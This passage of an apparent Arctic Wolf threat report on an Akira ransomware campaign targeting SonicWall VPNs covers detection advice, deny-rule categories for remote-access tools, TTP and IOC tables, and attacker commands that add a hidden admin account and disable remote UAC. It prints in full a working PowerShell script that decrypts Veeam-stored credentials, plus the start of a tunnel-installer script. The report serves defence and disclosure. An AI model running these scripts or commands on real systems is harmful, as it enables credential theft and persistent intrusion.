purposes.\r\nIP classification services may provide avenues for blocking logins from hosting-related ASNs altogether, although some\r\nexceptions may be needed depending on the use of legitimate services such as SD-WAN or SASE providers.\r\nNetwork\r\nWe observed LDAP discovery activity and Impacket SMBv2 session setup requests; network-based detection opportunities\r\nare available for both.\r\nEndpoint\r\nThe threat actors in this campaign relied heavily on tools used from specific locations such as ProgramData and Downloads.\r\nExecution of network scanning tools and archival tools like WinRAR from unusual locations on servers should be\r\nconsidered suspicious.\r\nAdditionally, App Control for Business (formerly known as WDAC) provides a means of blocking dual use applications\r\nleveraged by threat actors in this campaign. As an example, see our previous publication on blocking dual use tools\r\nassociated with Iranian threat activity via WDAC rules. While full implementation of such a policy is beyond the scope of\r\nthis article, the following categories of rules can be considered:\r\n1. Deny execution from untrusted paths: Block EXE/DLL/SYS/MSI/script execution from user-writable directories\r\nsuch as %ProgramData%, %TEMP%, %Users%\\Downloads, and %PUBLIC%. Allow only explicitly approved\r\nupdaters where necessary.\r\n2. Restrict executed code to trusted publishers: Only permit execution of signed code from approved vendors and\r\nproduct families.\r\n3. Enforce kernel-mode code integrity: Prevent unsigned or known-vulnerable drivers (e.g., sys, churchill_driver.sys,\r\netc) from loading, even with administrative rights.\r\n4. Block unauthorized remote tools: Explicitly deny execution of RMM and tunneling utilities (AnyDesk, RustDesk,\r\nCloudflared) unless explicitly sanctioned and allowlisted.\r\nConclusion\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 14 of 29\n\nThe threats described in this campaign demand early detection and a rapid response to avoid catastrophic impact to\r\norganizations. To facilitate this process, we recommend monitoring for VPN logins originating from untrusted hosting\r\ninfrastructure. Equally important is ensuring visibility into internal networks, since lateral movement and ransomware\r\nencryption can occur within hours or even minutes of initial access. Monitoring for anomalous SMB activity indicative of\r\nImpacket use provides an additional early detection opportunity.\r\nWhen firewalls are confirmed to be running firmware versions vulnerable to credential access or full configuration export,\r\npatching alone is not enough. In such situations, credentials must be reset wherever possible, including MFA-related secrets\r\nthat might otherwise be thought of as secure, and Active Directory credentials with VPN access. These considerations are\r\nbest practices that apply regardless of which firewall products are in use.\r\nAs this campaign evolves, Arctic Wolf Labs will continue to collaborate with SonicWall and the wider security community\r\nto protect against related threats. In the meantime, organizations should consider the credential security of their firewalls and\r\nother edge devices as an essential part of their security posture, and early detections described here should be considered to\r\nprotect against catastrophic impact.\r\nAcknowledgements\r\nArctic Wolf Labs would like to acknowledge and thank members of our Security Services team for their role in identifying\r\nand subsequently investigating the earliest intrusions associated with this campaign, especially Reid Hutchins and Michael\r\nMitra. Also, Trevor Daher and Jerbin Kolencheril for their exhaustive efforts supporting investigations and documenting\r\nevidence across multiple weeks of this campaign.\r\nAppendix\r\nTactics, Techniques, and Procedures (TTPs)\r\nTactic Technique Sub-techniques or Tools\r\nInitial\r\nAccess\r\nT1133:\r\nExternal\r\nRemote\r\nServices\r\nT1078: Valid\r\nAccounts\r\nCompromised VPN Credentials\r\nDefense\r\nEvasion\r\nT1562: Impair\r\nDefenses\r\nBYOVD Use\r\nCredential\r\nAccess\r\nT1555:\r\nCredentials\r\nfrom Password\r\nStores\r\nTargeted Veeam Backup \u0026 Recovery to extract passwords from the configuration database.\r\nPersistence\r\nT1136: Create\r\nAccount\r\nAkira affiliates create accounts named after popular services in order to blend into the environm\r\nnet user sqlbackup REDACTED /add\r\nnet localgroup administrators sqlbackup /add\r\nT1112: Modify\r\nRegistry\r\nAffiliates were observed modifying the registry to disable remote UAC restrictions. reg add\r\n\\”HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\S\r\n/v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 15 of 29\n\nPrivilege\r\nEscalation\r\nT1548.002:\r\nAbuse\r\nElevation\r\nControl\r\nMechanism:\r\nBypass User\r\nAccount\r\nControl\r\nDisabled remote UAC restrictions.\r\nDiscovery\r\nT1046:\r\nNetwork\r\nService\r\nDiscovery\r\nSoftPerfect Network Scanner\r\nAdvanced Port Scanner\r\nT1135:\r\nNetwork Share\r\nDiscovery\r\nSharpShares\r\nInvoke-ShareFinder\r\nT1087.001/002\r\n– Account\r\nDiscovery:\r\nDomain \u0026\r\nLocal Account\r\nUsed Powershell to enumerate local and domain accounts and attributes writing them to disk as\r\n\u003cvictim\u003e_users.csv\r\nLateral\r\nMovement\r\nT1021:\r\nRemote\r\nServices\r\nT1021.001: Remote Desktop Protocol\r\nT1021.002: SMB/Windows Admin Shares\r\nT1570: Lateral\r\nTool Transfer\r\nPsExec\r\nCollection\r\nT1560:\r\nArchive\r\nCollected Data\r\nWinRAR\r\nCommand\r\nand\r\nControl\r\nT1102: Web\r\nService\r\nCloudflared\r\nT1219:\r\nRemote Access\r\nTools\r\nAnydesk\r\nRustdesk\r\nMeshAgent\r\nAtera\r\nT1572:\r\nProtocol\r\nTunneling\r\nUse of SSH tunneling\r\nExfiltration\r\nRclone\r\nWinSCP\r\nFileZilla\r\nImpact T1486: Data\r\nEncrypted for\r\nImpact\r\nAkira ransomware encrypts files and appends the .akira extension to render data inaccessible to\r\ncoerce ransom payment.\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 16 of 29\n\nT1657:\r\nFinancial Theft\r\nAkira employs a double extortion model, exfiltrating sensitive data and encrypting systems to pr\r\nvictims into paying ransom demands.\r\nT1490: Inhibit\r\nSystem\r\nRecovery\r\nAkira ransomware deletes shadow copies inhibiting system recovery.\r\nTools\r\nName Description\r\nRustDesk\r\nAn open-source remote desktop tool which serves as an alternative to other products such as\r\nTeamViewer or AnyDesk.\r\nAnyDesk\r\nRemote desktop tool that enables users to access and control devices from anywhere, supporting\r\nfeatures like screen sharing and file transfer.\r\nMeshAgent\r\nA remote management tool used by threat actors to execute commands, transfer files, manage\r\naccounts, and use remote desktop features like RDP and VNC.\r\nAtera Remote monitoring and management tool that enables users to access and control devices.\r\nCrackMapExec\r\nOpen-source post-exploitation tool used by penetration testers to automate network assessments\r\nand post-exploitation tasks within large Active Directory environments, including credential\r\nvalidation, remote command execution, and lateral movement.\r\nKrbRelayUp\r\nOpen-source tool that enables local privilege escalation from a low-privileged domain user to\r\nSYSTEM on domain-joined Windows computers.\r\nImpacket\r\nOpen-source Python toolkit widely used in penetration testing to exploit Windows network\r\nservices, perform credential extraction, remote command execution, and lateral movement\r\nwithin Active Directory environments.\r\nMobaXterm\r\nWindows application that remote network tools, including SSH, RDP, VNC, FTP, and SFTP,\r\nallowing users to connect to and manage remote servers and systems.\r\nBloodHound\r\nAn open-source tool used by threat actors, penetration testers, and defenders to map and\r\nvisualize relationships and attack paths within Active Directory environments, helping identify\r\nsecurity misconfigurations and potential privilege escalation paths.\r\nSharpShares\r\nTool designed to enumerate all network shares within the current domain and resolve computer\r\nnames to IP addresses.\r\nCobaltStrike\r\nA penetration testing tool that allows threat actors to deploy customizable Beacons for command\r\nand control, perform lateral movement, escalate privileges, steal credentials, and deliver\r\nadditional payloads.\r\nNetexec\r\nAn open-source tool used by threat actors to automate network discovery, credential validation,\r\nlateral movement, and post-exploitation tasks across multiple protocols like SMB, WinRM,\r\nLDAP, SSH, and RDP.\r\nldapdomaindump\r\nReconnaissance tool used by threat actors to extract, enumerate, and dump extensive\r\ninformation from Active Directory via LDAP, including users, groups, computers, and\r\npassword-related attributes.\r\nCloudflared\r\nCloudflared is used by threat actors to create encrypted tunnels that allow persistent and covert\r\naccess to compromised networks for data exfiltration, command execution, and remote control.\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 17 of 29\n\nAdvanced IP/Port\r\nScanner\r\nA network scanning tool that is leveraged by attackers to quickly identify open IP addresses,\r\nports, and running services on a network.\r\nWinRAR A tool used to archive files for easier exfiltration.\r\nSoftPerfect Netscan\r\nNetwork scanning tool that threat actors use to discover live hosts, open ports, shared folders,\r\nand system information.\r\nrclone A tool used by threat actors to exfiltrate data to remote servers.\r\nFileZilla An open-source FTP application that threat actors use to exfiltrate data.\r\nIndicators of Compromise (IOCs)\r\nIndicator ASN Type Description\r\n155.117.117[.]34\r\nAS215703 –\r\nALEXANDRU\r\nVLAD trading as\r\nFREAKHOSTING\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n45.66.249[.]93\r\nAS62005 –\r\nBluevps Ou\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n193.239.236[.]149\r\nAS62240 –\r\nClouvider Limited\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n193.163.194[.]7\r\nAS62240 –\r\nClouvider Limited\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n194.33.45[.]194\r\nAS62240 –\r\nClouvider Limited\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n31.222.247[.]64\r\nAS62240 –\r\nClouvider Limited\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n62.76.147[.]106\r\nAS62240 –\r\nClouvider Limited\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n77.247.126[.]239\r\nAS62240 –\r\nClouvider Limited\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n83.229.17[.]123\r\nAS62240 –\r\nClouvider Limited\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n83.229.17[.]135\r\nAS62240 –\r\nClouvider Limited\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n83.229.17[.]148\r\nAS62240 –\r\nClouvider Limited\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n45.55.76[.]210\r\nAS14061 –\r\nDigitalocean  Llc\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n38.114.123[.]167 AS63023 – Gthost\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n38.114.123[.]229 AS63023 – Gthost\r\nIPv4\r\nAddress\r\nVPN Client IP\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 18 of 29\n\n107.155.93[.]154\r\nAS29802 –\r\nHivelocity  Inc.\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n144.168.41[.]74\r\nAS29802 –\r\nHivelocity  Inc.\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n91.191.214[.]170\r\nAS29802 –\r\nHivelocity  Inc.\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n193.29.63[.]226\r\nAS63473 –\r\nHosthatch  Llc\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n23.94.54[.]125\r\nAS36352 –\r\nHostpapa\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n185.33.86[.]2\r\nAS202015 – Hz\r\nHosting Ltd\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n79.141.160[.]33\r\nAS202015 – Hz\r\nHosting Ltd\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n79.141.173[.]235\r\nAS202015 – Hz\r\nHosting Ltd\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n185.181.230[.]108\r\nAS60602 –\r\nInovare-Prim Srl\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n207.188.6[.]17\r\nAS396356 –\r\nLatitude.Sh\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n107.175.102[.]58\r\nAS131199 –\r\nNexeon\r\nTechnologies  Inc.\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n185.174.100[.]199\r\nAS8100 –\r\nQuadranet\r\nEnterprises Llc\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n45.56.163[.]58\r\nAS8100 –\r\nQuadranet\r\nEnterprises Llc\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n104.194.11[.]34\r\nAS23470 –\r\nReliablesite.Net\r\nLlc\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n104.194.8[.]58\r\nAS23470 –\r\nReliablesite.Net\r\nLlc\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n104.238.205[.]105\r\nAS23470 –\r\nReliablesite.Net\r\nLlc\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n172.86.96[.]42\r\nAS14956 –\r\nRouterhosting Llc\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n144.172.110[.]103\r\nAS14956 –\r\nRouterHosting\r\nLLC\r\nIPv4\r\nAddress\r\nVPN Client IP\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 19 of 29\n\n144.172.110[.]37\r\nAS14956 –\r\nRouterHosting\r\nLLC\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n144.172.110[.]49\r\nAS14956 –\r\nRouterHosting\r\nLLC\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n185.168.208[.]102\r\nAS21249 –\r\nGLOBAL\r\nCONNECTIVITY\r\nSOLUTIONS LLP\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n172.96.10[.]212\r\nAS64236 – Unreal\r\nServers  Llc\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n107.158.128[.]106\r\nAS62904 – Eonix\r\nCorporation\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n131.226.2[.]47\r\nAS40676 – Psychz\r\nNetworks\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n193.242.184[.]58\r\nAS215381 –\r\nROCKHOSTER\r\nPRIVATE\r\nLIMITED\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n95.164.145[.]158\r\nAS394814 –\r\nISP4Life INC\r\nIPv4\r\nAddress\r\nVPN Client IP\r\n170.130.165[.]42\r\nAS62904 – Eonix\r\nCorporation\r\nIPv4\r\nAddress\r\nCommand and\r\nControl\r\n162.210.196[.]101\r\nAS30633 –\r\nLeaseweb Usa \r\nInc.\r\nIPv4\r\nAddress\r\nExfiltration\r\n206.168.190[.]143\r\nAS14315 –\r\n1gservers  Llc\r\nIPv4\r\nAddress\r\nExfiltration\r\nkali N/A Hostname\r\nThreat actor\r\nworkstation hostna\r\nWIN N/A Hostname\r\nThreat actor\r\nworkstation hostna\r\nDESKTOP-HPLM2TD N/A Hostname\r\nThreat actor\r\nworkstation hostna\r\nWINUTIL N/A Hostname\r\nThreat actor\r\nworkstation hostna\r\nDESKTOP-A2S6P81 N/A Hostname\r\nThreat actor\r\nworkstation hostna\r\nWIN-V1L65ED9I55 N/A Hostname\r\nThreat actor\r\nworkstation hostna\r\nWIN-5VVC95LFP2G N/A Hostname\r\nThreat actor\r\nworkstation hostna\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 20 of 29\n\nDESKTOP-EDE0RR5 N/A Hostname\r\nThreat actor\r\nworkstation hostna\r\nSERVER N/A Hostname\r\nThreat actor\r\nworkstation hostna\r\n16f83f056177c4ec24c7e99d01ca9d9d6713bd0497eeedb777a3ffefa99c97f0 N/A\r\nFile –\r\nSHA256\r\nBYOVD:\r\n· rwdrv.sys\r\n· churchill_driver.s\r\n385c235f9f52c68ec4adc7ee07de26b84b108116\r\nFile –\r\nSHA1\r\ncheck_hvci_admin\r\nbd1f381e5a3db22e88776b7873d4d2835e9a1ec620571d2b1da0c58f81c84a56\r\nFile –\r\nSHA256\r\nhlpdrv.sys\r\nExcluded Locales from BYOVD DLL\r\nLocale Code Language Name Primary Country/Region Name\r\nru-RU Russian Russia\r\nru-BY Russian Belarus\r\nru-KG Russian Kyrgyzstan\r\nru-MD Russian Moldova\r\nru-UA Russian Ukraine\r\nkk-KZ Kazakh Kazakhstan\r\nky-KG Kyrgyz Kyrgyzstan\r\nuz-Cyrl Uzbek (Cyrillic script) Uzbekistan\r\nuz-Cyrl-UZ Uzbek (Cyrillic script) Uzbekistan\r\nuz-Latn Uzbek (Latin script) Uzbekistan\r\nuz-Latn-UZ Uzbek (Latin script) Uzbekistan\r\nuz-Arab Uzbek (Arabic script) Uzbekistan\r\naz-Cyrl Azerbaijani (Cyrillic) Azerbaijan\r\naz-Cyrl-AZ Azerbaijani (Cyrillic) Azerbaijan\r\naz-Latn Azerbaijani (Latin) Azerbaijan\r\naz-Latn-AZ Azerbaijani (Latin) Azerbaijan\r\nka-GE Georgian Georgia\r\nuk-UA Ukrainian Ukraine\r\ntg-Cyrl Tajik (Cyrillic script) Tajikistan\r\ntg-Cyrl-TJ Tajik (Cyrillic script) Tajikistan\r\ntk-TM Turkmen Turkmenistan\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 21 of 29\n\nhy-AM Armenian Armenia\r\nbe-BY Belarusian Belarus\r\nlt-LT Lithuanian Lithuania\r\nlv-LV Latvian Latvia\r\nro-MD Romanian Moldova\r\net-EE Estonian Estonia\r\nFull Source: Veeam Credential Extraction PowerShell Script\r\n#Requires -RunAsAdministrator\r\n#Requires -Version 5.1\r\n$ErrorActionPreference = \"Stop\"\r\n$env:PSReadlineHistorySavePath = $null\r\nfunction Get-EncryptionSalt {\r\n param([string]$veeamRegPath)\r\n $saltPaths = @(\r\n \"$veeamRegPath\\Data\",\r\n \"$veeamRegPath\",\r\n \"$veeamRegPath\\SqlSettings\",\r\n \"$veeamRegPath\\DBManager\",\r\n \"$veeamRegPath\\EnterpriseManager\",\r\n \"HKLM:\\SOFTWARE\\WOW6432Node\\Veeam\\Veeam Backup and Replication\\Data\",\r\n \"HKLM:\\SOFTWARE\\WOW6432Node\\Veeam\\Veeam Backup and Replication\"\r\n )\r\n foreach ($path in $saltPaths) {\r\n if (Test-Path $path) {\r\n $prop = Get-ItemProperty -Path $path -Name \"EncryptionSalt\" -ErrorAction SilentlyContinue\r\n if ($prop -and $prop.EncryptionSalt) {\r\n return $prop.EncryptionSalt\r\n }\r\n }\r\n }\r\n $configPath = \"C:\\ProgramData\\Veeam\\Backup\\Configuration\\Configuration.xml\"\r\n if (Test-Path $configPath) {\r\n $configContent = Get-Content $configPath -Raw\r\n if ($configContent -match '\u003cEncryptionSalt\u003e([^\u003c]+)\u003c/EncryptionSalt\u003e') {\r\n return $matches[1]\r\n }\r\n }\r\n Write-Host \"Encryption salt not found, continuing without it\" -ForegroundColor Yellow\r\n return $null\r\n}\r\nfunction Enable-PgTrustAuth {\r\n param(\r\n [string]$pgHbaPath,\r\n [ref]$BackupCreated\r\n )\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 22 of 29\n\nif (-not (Test-Path $pgHbaPath)) {\r\n Write-Host \"pg_hba.conf not found: $pgHbaPath\" -ForegroundColor Yellow\r\n return $false\r\n }\r\n $backupPath = \"$pgHbaPath.backup_$(Get-Date -Format 'yyyyMMdd_HHmmss')\"\r\n Copy-Item $pgHbaPath $backupPath -Force\r\n $BackupCreated.Value = $backupPath\r\n $trustRules = @(\r\n \"\",\r\n \"# Veeam Credential Recovery - Temp Trust Rules [Added $(Get-Date)]\",\r\n \"host all all 127.0.0.1/32 trust\",\r\n \"host all all ::1/128 trust\"\r\n )\r\n $currentContent = Get-Content $pgHbaPath\r\n $newContent = $trustRules + $currentContent\r\n $newContent | Set-Content $pgHbaPath -Force\r\n return $true\r\n}\r\nfunction Restore-PgConf {\r\n param(\r\n [string]$backupPath,\r\n [string]$pgHbaPath\r\n )\r\n if (Test-Path $backupPath) {\r\n Copy-Item $backupPath $pgHbaPath -Force -ErrorAction SilentlyContinue\r\n Remove-Item $backupPath -Force -ErrorAction SilentlyContinue\r\n }\r\n}\r\nfunction Get-PostgreSQLService {\r\n $services = Get-CimInstance -ClassName Win32_Service -Filter \"DisplayName LIKE '%PostgreSQL%'\"\r\n return $services | Select-Object -First 1\r\n}\r\nfunction Restart-PostgreSQL {\r\n $service = Get-PostgreSQLService\r\n if (-not $service) {\r\n Write-Host \"PostgreSQL service not found\" -ForegroundColor Yellow\r\n return $false\r\n }\r\n Restart-Service -Name $service.Name -Force\r\n $attempts = 0\r\n do {\r\n Start-Sleep -Seconds 2\r\n $serviceStatus = (Get-Service -Name $service.Name).Status\r\n $attempts++\r\n } until ($serviceStatus -eq 'Running' -or $attempts -ge 10)\r\n return ($serviceStatus -eq 'Running')\r\n}\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 23 of 29\n\nfunction Decrypt-VeeamPassword {\r\n param(\r\n [string]$encryptedPassword,\r\n [string]$saltbase\r\n )\r\n if ([string]::IsNullOrWhiteSpace($encryptedPassword)) {\r\n return \"\u003cEMPTY\u003e\"\r\n }\r\n try {\r\n if ($encryptedPassword.StartsWith(\"AQAA\")) {\r\n $data = [Convert]::FromBase64String($encryptedPassword)\r\n $raw = [Security.Cryptography.ProtectedData]::Unprotect(\r\n $data,\r\n $null,\r\n [Security.Cryptography.DataProtectionScope]::LocalMachine\r\n )\r\n return [Text.Encoding]::UTF8.GetString($raw)\r\n }\r\n elseif ($encryptedPassword.StartsWith(\"VmVlY\")) {\r\n $allBytes = [Convert]::FromBase64String($encryptedPassword)\r\n if ($allBytes.Length -gt 37) {\r\n $payload = $allBytes[37..($allBytes.Length-1)]\r\n if ($saltbase) {\r\n try {\r\n $saltBytes = [Convert]::FromBase64String($saltbase)\r\n $raw = [Security.Cryptography.ProtectedData]::Unprotect(\r\n $payload,\r\n $saltBytes,\r\n [Security.Cryptography.DataProtectionScope]::LocalMachine\r\n )\r\n return [Text.Encoding]::UTF8.GetString($raw)\r\n }\r\n catch {\r\n # Continue without salt\r\n }\r\n }\r\n $raw = [Security.Cryptography.ProtectedData]::Unprotect(\r\n $payload,\r\n $null,\r\n [Security.Cryptography.DataProtectionScope]::LocalMachine\r\n )\r\n return [Text.Encoding]::UTF8.GetString($raw)\r\n }\r\n return \"\u003cINVALID FORMAT\u003e\"\r\n }\r\n else {\r\n # Handle Veeam 11 format with DPAPI without salt\r\n $data = [Convert]::FromBase64String($encryptedPassword)\r\n $raw = [Security.Cryptography.ProtectedData]::Unprotect(\r\n $data,\r\n $null,\r\n [Security.Cryptography.DataProtectionScope]::LocalMachine\r\n )\r\n return [Text.Encoding]::UTF8.GetString($raw)\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 24 of 29\n\n}\r\n }\r\n catch {\r\n return \"\u003cDECRYPT ERROR: $($_.Exception.Message)\u003e\"\r\n }\r\n}\r\ntry {\r\n Write-Host \"`n=== Veeam Credential Recovery ===\" -ForegroundColor Cyan\r\n Write-Host \"Supports Veeam v11+ | MSSQL \u0026 PostgreSQL`n\"\r\n Add-Type -AssemblyName System.Security, System.Data, System.Text.Encoding\r\n # Try different registry paths for compatibility\r\n $veeamRegPath = \"HKLM:\\SOFTWARE\\Veeam\\Veeam Backup and Replication\"\r\n if (-not (Test-Path $veeamRegPath)) {\r\n $veeamRegPath = \"HKLM:\\SOFTWARE\\WOW6432Node\\Veeam\\Veeam Backup and Replication\"\r\n if (-not (Test-Path $veeamRegPath)) {\r\n throw \"Veeam installation not found in registry!\"\r\n }\r\n }\r\n # Detect database configuration location\r\n $dbConfigPath = \"$veeamRegPath\\DatabaseConfigurations\"\r\n $dbConfigFound = $false\r\n $DBProduct = \"Mssql\" # Default to MSSQL\r\n if (Test-Path $dbConfigPath) {\r\n # Veeam 12+ style configuration\r\n $dbConfigFound = $true\r\n $DBProduct = (Get-ItemProperty -Path $dbConfigPath -ErrorAction SilentlyContinue).SqlActiveConfigurati\r\n }\r\n else {\r\n # Check for Veeam 11 style configuration in root key\r\n $rootProps = Get-ItemProperty -Path $veeamRegPath -ErrorAction SilentlyContinue\r\n if ($rootProps -and $rootProps.SqlDatabaseName -and $rootProps.SqlServerName) {\r\n $dbConfigFound = $true\r\n $DBProduct = \"Mssql\"\r\n }\r\n }\r\n if (-not $dbConfigFound) {\r\n throw \"Database configuration not found!\"\r\n }\r\n Write-Host \"Database type: $DBProduct\" -ForegroundColor Yellow\r\n $saltbase = Get-EncryptionSalt $veeamRegPath\r\n $credentials = @()\r\n $pgTrustMethodUsed = $false\r\n $pgBackupPath = $null\r\n if ($DBProduct -eq \"Mssql\") {\r\n if ($dbConfigFound -and (Test-Path \"$dbConfigPath\\MsSql\")) {\r\n # Veeam 12+ configuration\r\n $SQLConfiguration = Get-ItemProperty -Path \"$dbConfigPath\\MsSql\" -ErrorAction Stop\r\n $SQLServer = $SQLConfiguration.SqlServerName\r\n $SQLInstance = $SQLConfiguration.SqlInstanceName\r\n $SQLDB = $SQLConfiguration.SqlDatabaseName\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 25 of 29\n\n}\r\n else {\r\n # Veeam 11 configuration\r\n $SQLConfiguration = Get-ItemProperty -Path $veeamRegPath -ErrorAction Stop\r\n $SQLServer = $SQLConfiguration.SqlServerName\r\n $SQLInstance = $SQLConfiguration.SqlInstanceName\r\n $SQLDB = $SQLConfiguration.SqlDatabaseName\r\n }\r\n $SQLConnection = if ($SQLInstance) { \"$SQLServer\\$SQLInstance\" } else { $SQLServer }\r\n try {\r\n $connString = \"Server=$SQLConnection;Database=$SQLDB;Integrated Security=SSPI;\"\r\n $conn = New-Object System.Data.SqlClient.SqlConnection($connString)\r\n $conn.Open()\r\n $cmdText = \"SELECT [user_name] AS [username], [password], [description] FROM [dbo].[Credentials]\"\r\n $cmd = New-Object System.Data.SqlClient.SqlCommand($cmdText, $conn)\r\n $adapter = New-Object System.Data.SqlClient.SqlDataAdapter($cmd)\r\n $dataset = New-Object System.Data.DataSet\r\n $adapter.Fill($dataset) | Out-Null\r\n if ($dataset.Tables[0] -and $dataset.Tables[0].Rows.Count -gt 0) {\r\n $credentials = $dataset.Tables[0]\r\n }\r\n }\r\n finally {\r\n if ($conn.State -eq \"Open\") {\r\n $conn.Close()\r\n }\r\n }\r\n }\r\n elseif ($DBProduct -eq \"PostgreSql\") {\r\n $pgConfig = Get-ItemProperty -Path \"$dbConfigPath\\PostgreSql\" -ErrorAction Stop\r\n $pgPort = $pgConfig.SqlHostPort\r\n $pgDB = $pgConfig.SqlDatabaseName\r\n $psqlPath = Get-ChildItem -Path \"C:\\Program Files\\PostgreSQL\" -Recurse -Filter \"psql.exe\" |\r\n Where-Object { $_.FullName -match \"bin\\\\psql\\.exe\" } |\r\n Sort-Object { [version]($_.Directory.Parent.Name) } -Descending |\r\n Select-Object -First 1 -ExpandProperty FullName\r\n if (-not $psqlPath -or -not (Test-Path $psqlPath)) {\r\n throw \"psql.exe not found!\"\r\n }\r\n $pgDataDir = (Get-Item $psqlPath).Directory.Parent.FullName + \"\\data\"\r\n $pgHbaPath = Join-Path $pgDataDir \"pg_hba.conf\"\r\n if (Enable-PgTrustAuth $pgHbaPath ([ref]$pgBackupPath)) {\r\n if (Restart-PostgreSQL) {\r\n $pgTrustMethodUsed = $true\r\n $query = \"SELECT user_name AS username, password, description FROM credentials\"\r\n $credentials = \u0026 $psqlPath -h localhost -p $pgPort -U postgres -d $pgDB -c $query --csv 2\u003e$nul\r\n }\r\n }\r\n }\r\n else {\r\n throw \"Unsupported database: $DBProduct\"\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 26 of 29\n\n}\r\n if (-not $credentials -or ($credentials | Measure-Object).Count -eq 0) {\r\n throw \"No credentials found\"\r\n }\r\n $validCredentials = @()\r\n foreach ($cred in $credentials) {\r\n $decrypted = Decrypt-VeeamPassword $cred.password $saltbase\r\n if (-not [string]::IsNullOrWhiteSpace($decrypted) -and $decrypted -ne \"\u003cEMPTY\u003e\") {\r\n $validCredentials += [PSCustomObject]@{\r\n UserName = $cred.username\r\n Password = $decrypted\r\n Description = if ($cred.description) { $cred.description } else { \"\" }\r\n }\r\n }\r\n }\r\n if ($validCredentials.Count -eq 0) {\r\n Write-Host \"No valid credentials found\" -ForegroundColor Yellow\r\n }\r\n else {\r\n Write-Host \"`n=== Decrypted Credentials ===\" -ForegroundColor Green\r\n $validCredentials | Format-Table -Wrap -AutoSize\r\n }\r\n}\r\ncatch {\r\n Write-Host \"`nERROR: $($_.Exception.Message)\" -ForegroundColor Red\r\n}\r\nfinally {\r\n if ($pgTrustMethodUsed -and $pgBackupPath) {\r\n $pgDataDir = (Get-Item $psqlPath).Directory.Parent.FullName + \"\\data\"\r\n $pgHbaPath = Join-Path $pgDataDir \"pg_hba.conf\"\r\n Restore-PgConf $pgBackupPath $pgHbaPath\r\n Restart-PostgreSQL | Out-Null\r\n }\r\n}\r\nFull Source: CloudFlared Installation PowerShell Script\r\n# Set TLS 1.2 for secure downloads\r\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\r\n# Alternative download URLs in case GitHub is blocked\r\n$msiUrl = 'https://github.com/cloudflare/cloudflared/releases/download/2025.6.0/cloudflared-windows-amd64.msi\r\n$exeUrl = 'https://github.com/cloudflare/cloudflared/releases/download/2025.6.0/cloudflared-windows-amd64.exe\r\n# Try multiple download methods\r\ntry {\r\n # Attempt download with progress\r\n Write-Host \"Downloading cloudflared MSI package...\"\r\n try {\r\n Invoke-WebRequest -Uri $msiUrl -OutFile 'cloudflared.msi' -UseBasicParsing\r\n } catch {\r\n Write-Host \"Primary download failed, trying alternative method...\"\r\n # Alternative download method using BITS\r\n Start-BitsTransfer -Source $msiUrl -Destination 'cloudflared.msi'\r\n }\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 27 of 29\n\n# Verify 